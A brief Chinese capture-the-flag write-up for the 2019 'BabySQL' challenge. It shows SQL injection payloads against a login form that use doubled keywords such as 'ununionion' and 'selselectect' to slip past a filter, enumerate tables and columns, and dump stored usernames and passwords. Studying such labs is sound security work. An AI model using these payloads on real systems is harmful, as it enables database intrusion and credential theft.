[极客大挑战 2019]BabySQL

• 首先尝试万能密码
  admin
admin' or 1=1#
  失败

• 一般注入
  admin
admin' union select 1,2,3#
  
  失败
  这里只显示了1,2,3#,怀疑是过滤了union,select`等关键字，尝试双鞋绕过

• 双写绕过
  admin
admin' ununionion selselectect 1,2,3#
  
  ok,这下就好办了

• 爆表
  admin
admin' uniunionon selselectect 1,group_concat(table_name),3 frofromm infoorrmation_schema.tables whewherere table_schema=database()#
  
  注意这里的from和or也被过滤了需要双写

• 爆列名
  admin
admin' uniunionon selselectect 1,group_concat(column_name),3 frofromm infoorrmation_schema.columns whewherere table_name="b4bsql"#
  

• 爆字段
  admin
admin' uniunionon selselectect 1,group_concat(username),group_concat(passwoorrd) frofromm b4bsql#
  
  得到flag和一些。。。